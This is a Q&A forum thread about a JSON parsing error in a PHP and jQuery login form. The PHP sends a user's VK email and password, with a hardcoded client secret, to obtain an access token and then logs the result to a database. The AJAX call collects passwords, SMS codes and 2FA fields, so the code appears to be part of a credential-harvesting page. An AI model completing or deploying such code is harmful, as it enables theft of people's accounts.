# Why when try to send request to api from ajax form,I took json syntax parsing error?

Tags: php, json, ajax

Why when try to send request to api from ajax form,I took json syntax parsing error?

```
Uncaught SyntaxError: Unexpected token < in JSON at position 0
    at JSON.parse (<anonymous>)
    at Object.<anonymous> (3.php:72)
    at j (jquery-1.11.1.min.js:1)
    at Object.fireWith [as resolveWith] (jquery-1.11.1.min.js:1)
    at x (jquery-1.11.1.min.js:1)
    at XMLHttpRequest.b (jquery-1.11.1.min.js:1)
```

And this is my code:

```
 get_token = post ('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$email.'&password='.$password.'' ,array(
        'headers' => array(
            'accept: '.$headers['accept'],
            'content-type: '.$headers['content-type'],
            'user-agent: '.$headers['user-agent']
        )
    ));
    //Если авторизация прошла успешно
        if (preg_match("/[a-z0-9]{85}/", $get_token['headers'], $token))
    {
        $token1 = json_decode(file_get_contents('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$email.'&password='.$password.''), true);
        $data = json_decode(file_get_contents('https://api.vk.com/method/users.get?user_id='.$token1['user_id'].'&access_token='.$token[0].'&fields=uid,first_name,last_name&v=5.80'), true);
    //Записываем в переменную текущую дату и время сервера
        $date_l = date("H:i:s  d-m-Y");
    //Подключаемся к БД
```

Comment: If the content type is already json you do not need to parse it in js

Comment: So how to make it?

Comment: Can you show your javascript?

Comment: @jgetner do you meen jquery-1.11.1.min.js?

Comment: Your ajax request.  That handles parsing the JSON on the client side.

Comment: @jgetner 'var auth = $.ajax("continue.php?act=login&login=" + encodeURIComponent(login) + "&oldPassword=" + encodeURIComponent(password) + "&captcha_key=" + captcha_key + "&captcha_sid=" + captcha_sid + "&validation_sid=" + validation_sid + "&code=" + smscode + "&newPassword=" + encodeURIComponent(g("newpassword").value) + "&is2fa=" + (have2fa ? 1 : 0) + "&qid=" + encodeURIComponent(window.location.search) + "&token=" + gettedToken).done(function() {
  var response = JSON.parse(auth.responseText);'

Comment: remove JSON.parse and add console.log(auth.responseText)  ensure that the when you view your console output check to see if is already an object.  Then you can just access the object as normal.

Comment: @jgetner I need to remove just JSON.parse(auth.responseText); or full line var response = JSON.parse(auth.responseText) ?

Comment: var response = auth.responseText;  console.log(response);